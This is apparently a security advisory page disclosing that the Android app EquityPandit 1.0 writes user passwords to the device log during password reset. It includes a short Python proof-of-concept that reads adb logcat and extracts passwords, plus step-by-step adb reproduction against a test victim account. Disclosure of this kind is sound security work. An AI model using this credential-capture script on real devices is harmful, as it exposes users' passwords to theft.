EquityPandit 1.0 Password Disclosure

2019.05.29
Credit: ManhNho
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit title: EquityPandit v1.0 - Insecure Logging #Date:27/05/2019 #Exploit Author: ManhNho #Software name: "EquityPandit" #Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit #Version: 1.0 # Category: Android apps #Description: - Sometimes developers keeps sensitive data logged into the developer console. Thus, attacker easy to capture sensitive information like password. - In this application, with adb, attacker can capture password of any users via forgot password function. #Requirement: - Santoku virtual machine - Android virtual machine (installed "EquityPandit" apk file) - Victim user/password: victim@abc.com/123456 - Exploit code named capture.py in Santoku vm as below: import subprocess import re process_handler = subprocess.Popen(['adb', 'logcat', '-d'], stdout=subprocess.PIPE) dumps = process_handler.stdout.read() password_list = re.findall(r'password\s(.*)', dumps) print 'Captured %i passwords! \nThey are:' %len(password_list) for index, item in enumerate(password_list): print '\t#%i: %s' %(int(index)+1, item) #Reproduce: - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x) adb connect x.x.x.x - Step 2: From Android machine, open EquityPandit, click forgot password function for acccount "victim@abc.com" and then click submit - Step 3: From Santoku, execute capture.py - Actual: Password of "victim@abc.com" will be show in terminal as "123456" #Demo: https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top